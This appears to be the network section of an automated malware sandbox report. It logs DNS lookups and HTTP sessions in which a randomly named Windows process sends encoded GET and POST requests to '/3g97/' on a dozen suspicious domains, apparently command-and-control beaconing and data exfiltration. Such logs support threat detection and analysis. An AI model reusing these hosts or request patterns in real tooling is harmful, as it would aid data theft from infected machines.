                                                                                              Apr 24, 2024 07:28:55.973201036 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.274682999 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274739981 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274787903 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274821997 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.274827003 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274864912 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274883032 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.274991989 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.275034904 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.275048971 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.275078058 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.275178909 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.275187969 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.275433064 CEST4978180192.168.2.491.195.240.19
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 07:26:06.431082010 CEST | 192.168.2.4 | 1.1.1.1 | 0x206 | Standard query (0) | www.jthzbrdb.fun | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:26:22.382654905 CEST | 192.168.2.4 | 1.1.1.1 | 0x38da | Standard query (0) | www.a-two-spa-salon.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:26:37.766870975 CEST | 192.168.2.4 | 1.1.1.1 | 0x8790 | Standard query (0) | www.ordinarythoughts.org | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:26:46.054127932 CEST | 192.168.2.4 | 1.1.1.1 | 0x2c85 | Standard query (0) | www.mz3fk6g3.sbs | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:27:00.595058918 CEST | 192.168.2.4 | 1.1.1.1 | 0xefcb | Standard query (0) | www.heldhold.life | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:27:15.969609976 CEST | 192.168.2.4 | 1.1.1.1 | 0x7b04 | Standard query (0) | www.tavernadoheroi.store | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:27:31.375391960 CEST | 192.168.2.4 | 1.1.1.1 | 0xeb9b | Standard query (0) | www.carliente.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:27:46.501581907 CEST | 192.168.2.4 | 1.1.1.1 | 0xe1cc | Standard query (0) | www.paydayloans3.shop | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:02.453902960 CEST | 192.168.2.4 | 1.1.1.1 | 0x9164 | Standard query (0) | www.kansaiwoody.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:16.828180075 CEST | 192.168.2.4 | 1.1.1.1 | 0x3fa3 | Standard query (0) | www.corvidemporium.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:30.704941988 CEST | 192.168.2.4 | 1.1.1.1 | 0xd54b | Standard query (0) | www.levelstep.online | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:31.715653896 CEST | 192.168.2.4 | 1.1.1.1 | 0xd54b | Standard query (0) | www.levelstep.online | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:46.234805107 CEST | 192.168.2.4 | 1.1.1.1 | 0x14fb | Standard query (0) | www.brothedboil.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:29:01.297986984 CEST | 192.168.2.4 | 1.1.1.1 | 0xac77 | Standard query (0) | www.alpine3dcreations.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:29:09.517828941 CEST | 192.168.2.4 | 1.1.1.1 | 0x55a9 | Standard query (0) | www.mervadohome.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:29:17.750794888 CEST | 192.168.2.4 | 1.1.1.1 | 0xe16f | Standard query (0) | www.tondex.finance | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 07:26:06.629376888 CEST | 1.1.1.1 | 192.168.2.4 | 0x206 | No error (0) | www.jthzbrdb.fun | | 80.240.20.220 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:26:22.797044039 CEST | 1.1.1.1 | 192.168.2.4 | 0x38da | No error (0) | www.a-two-spa-salon.com | | 157.7.107.63 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:26:37.960792065 CEST | 1.1.1.1 | 192.168.2.4 | 0x8790 | Name error (3) | www.ordinarythoughts.org | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:26:46.275193930 CEST | 1.1.1.1 | 192.168.2.4 | 0x2c85 | No error (0) | www.mz3fk6g3.sbs | | 172.217.16.36 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:27:00.892350912 CEST | 1.1.1.1 | 192.168.2.4 | 0xefcb | No error (0) | www.heldhold.life | | 203.161.46.103 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:27:16.327651978 CEST | 1.1.1.1 | 192.168.2.4 | 0x7b04 | No error (0) | www.tavernadoheroi.store | tavernadoheroi.store | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:27:16.327651978 CEST | 1.1.1.1 | 192.168.2.4 | 0x7b04 | No error (0) | tavernadoheroi.store | | 162.240.81.18 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:27:31.864826918 CEST | 1.1.1.1 | 192.168.2.4 | 0xeb9b | No error (0) | www.carliente.com | carliente.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:27:31.864826918 CEST | 1.1.1.1 | 192.168.2.4 | 0xeb9b | No error (0) | carliente.com | | 217.160.0.111 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:27:46.989042044 CEST | 1.1.1.1 | 192.168.2.4 | 0xe1cc | No error (0) | www.paydayloans3.shop | | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:02.832731962 CEST | 1.1.1.1 | 192.168.2.4 | 0x9164 | No error (0) | www.kansaiwoody.com | | 118.27.122.214 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:17.135101080 CEST | 1.1.1.1 | 192.168.2.4 | 0x3fa3 | No error (0) | www.corvidemporium.com | cdn1.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:28:17.135101080 CEST | 1.1.1.1 | 192.168.2.4 | 0x3fa3 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:28:17.135101080 CEST | 1.1.1.1 | 192.168.2.4 | 0x3fa3 | No error (0) | td-ccm-neg-87-45.wixdns.net | | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:31.820724964 CEST | 1.1.1.1 | 192.168.2.4 | 0xd54b | No error (0) | www.levelstep.online | levelstep.online | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:28:31.820724964 CEST | 1.1.1.1 | 192.168.2.4 | 0xd54b | No error (0) | levelstep.online | | 31.186.11.254 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:31.869611979 CEST | 1.1.1.1 | 192.168.2.4 | 0xd54b | No error (0) | www.levelstep.online | levelstep.online | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:28:31.869611979 CEST | 1.1.1.1 | 192.168.2.4 | 0xd54b | No error (0) | levelstep.online | | 31.186.11.254 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:28:46.487632036 CEST | 1.1.1.1 | 192.168.2.4 | 0x14fb | No error (0) | www.brothedboil.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:28:46.487632036 CEST | 1.1.1.1 | 192.168.2.4 | 0x14fb | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:29:01.460392952 CEST | 1.1.1.1 | 192.168.2.4 | 0xac77 | Name error (3) | www.alpine3dcreations.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:29:09.679650068 CEST | 1.1.1.1 | 192.168.2.4 | 0x55a9 | Name error (3) | www.mervadohome.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:29:18.081370115 CEST | 1.1.1.1 | 192.168.2.4 | 0xe16f | No error (0) | www.tondex.finance | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:29:18.081370115 CEST | 1.1.1.1 | 192.168.2.4 | 0xe16f | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                                                                                              • www.jthzbrdb.fun
                                                                                              • www.a-two-spa-salon.com
                                                                                              • www.mz3fk6g3.sbs
                                                                                              • www.heldhold.life
                                                                                              • www.tavernadoheroi.store
                                                                                              • www.carliente.com
                                                                                              • www.paydayloans3.shop
                                                                                              • www.kansaiwoody.com
                                                                                              • www.corvidemporium.com
                                                                                              • www.levelstep.online
                                                                                              • www.brothedboil.com
                                                                                              • www.tondex.finance
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49740 | 80.240.20.220 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:26:07.020849943 CEST | 454 | OUT | GET /3g97/?AlB=sdJPX&12l42=0byNfP8xYbFTvv3TFTBCb86kR2BGbvQk+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhMgT0gLImR5/DqviqEDtH5dgpFLFfPLyFVKE= HTTP/1.1
                                                                                              Host: www.jthzbrdb.fun
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:26:07.322947025 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:26:07 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 1409
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              ETag: "629dd94c-581"
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><body> <p><a href="http://hostname.domain.tld/">hostname.domain.tld</a></p> <h1>404
Apr 24, 2024 07:26:07.322971106 CEST | 309 | IN
                                                                                              Data Ascii: </h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start again from <a href="http://hostname.domain.tld/">home</a> or go back to the <a href="javascript


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 157.7.107.63 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:26:23.075793982 CEST | 746 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.a-two-spa-salon.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.a-two-spa-salon.com
                                                                                              Referer: http://www.a-two-spa-salon.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpRpIdFSUAf6ptE8wLI7F/xw/YSdJzEVMbOg==
Apr 24, 2024 07:26:23.555524111 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:26:23 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/8.2.18
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                                              Data Ascii: 3b58<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="tex


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
2  192.168.2.4  49743  157.7.107.63  80  1620  C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp  Bytes transferred  Direction  Data
Apr 24, 2024 07:26:26.677110910 CEST  766  OUT  POST /3g97/ HTTP/1.1
                                                                                              Host: www.a-two-spa-salon.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.a-two-spa-salon.com
                                                                                              Referer: http://www.a-two-spa-salon.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=46j9iO5agqM5rv5F70OeCd0TRPBgHeuiHqkdLIUKKn51feV/Ol6OWs1+fYio5NjTjxnkSNtnfcy2Zy+PE2PXY1bRvvjo6SnT/U44YWZVWmvJXF1U0VAaLuTMxwO6LRFa/IqMGr31FNCsN7tW4UU6mDeuCQ0LpRIVT8FdDwcsYoRpMahRZKkojwbrPaAHJWxSVuZqhj5uzIK/FcuulSKFrWc=
Apr 24, 2024 07:26:27.152697086 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:26:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/8.2.18
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                                              Data Ascii: 3b58<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="tex


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
3  192.168.2.4  49744  157.7.107.63  80  1620  C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp  Bytes transferred  Direction  Data
Apr 24, 2024 07:26:29.472825050 CEST  10848  OUT  POST /3g97/ HTTP/1.1
                                                                                              Host: www.a-two-spa-salon.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.a-two-spa-salon.com
                                                                                              Referer: http://www.a-two-spa-salon.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:26:29.951217890 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:26:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/8.2.18
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                                              Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49745 | 157.7.107.63 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:26:32.277775049 CEST | 461 | OUT | GET /3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.a-two-spa-salon.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:26:32.748277903 CEST | 506 | IN | HTTP/1.1 301 Moved Permanently
                                                                                              Date: Wed, 24 Apr 2024 05:26:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/8.2.18
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              X-Redirect-By: WordPress
                                                                                              Location: http://a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX
                                                                                              X-Cache: MISS


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49746 | 172.217.16.36 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:26:46.608926058 CEST | 725 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.mz3fk6g3.sbs
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.mz3fk6g3.sbs
                                                                                              Referer: http://www.mz3fk6g3.sbs/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=UBynKsRmlh0rYM/RmwsiyWNzPKLQjfYCUoGjZNe5cIZEYXbcnJAKYfh3aWpxI+z2fjDfzhB6m1du3W9hlKx03xwlasK0qjLvaM01L9HXkUYn+Qyo6TkwkBZJWdv61SyAKZI+5OEXgfXq7y6CdHqy/964RtOu47RU2j08wPcFdw7ELX8ZMRg/vxYrXeJurL7ZaA==
Apr 24, 2024 07:26:47.027081966 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Referrer-Policy: no-referrer
                                                                                              Content-Length: 1566
                                                                                              Date: Wed, 24 Apr 2024 05:26:46 GMT
                                                                                              Connection: close
                                                                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49747 | 172.217.16.36 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:26:49.463195086 CEST | 745 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.mz3fk6g3.sbs
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.mz3fk6g3.sbs
                                                                                              Referer: http://www.mz3fk6g3.sbs/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=UBynKsRmlh0rbtvR1DUi6WNwKKLQp/YeUoCjZPz8c9BEY1DcmL4Kbfh3dmp0Qez9fjPXzhN6m15u3XNhl5Zz4BwjWMK20TLvaM01L8j9kUQn+EOo8xAx7xZKGNv6kCyEKZIX5Mh4gdfq7zKCcWq9sd66PdOxwYAC5iE91u8aQyzhHxtDdgBo9x8YKZAamIGQBCPSq332UL6No/JbCtz1wqU=
Apr 24, 2024 07:26:49.881474972 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Referrer-Policy: no-referrer
                                                                                              Content-Length: 1566
                                                                                              Date: Wed, 24 Apr 2024 05:26:49 GMT
                                                                                              Connection: close
                                                                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
Apr 24, 2024 07:26:49.881500006 CEST | 451 | IN
                                                                                              Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49748 | 172.217.16.36 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:26:52.311630964 CEST | 10827 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.mz3fk6g3.sbs
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.mz3fk6g3.sbs
                                                                                              Referer: http://www.mz3fk6g3.sbs/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:26:52.731326103 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Referrer-Policy: no-referrer
                                                                                              Content-Length: 1566
                                                                                              Date: Wed, 24 Apr 2024 05:26:52 GMT
                                                                                              Connection: close
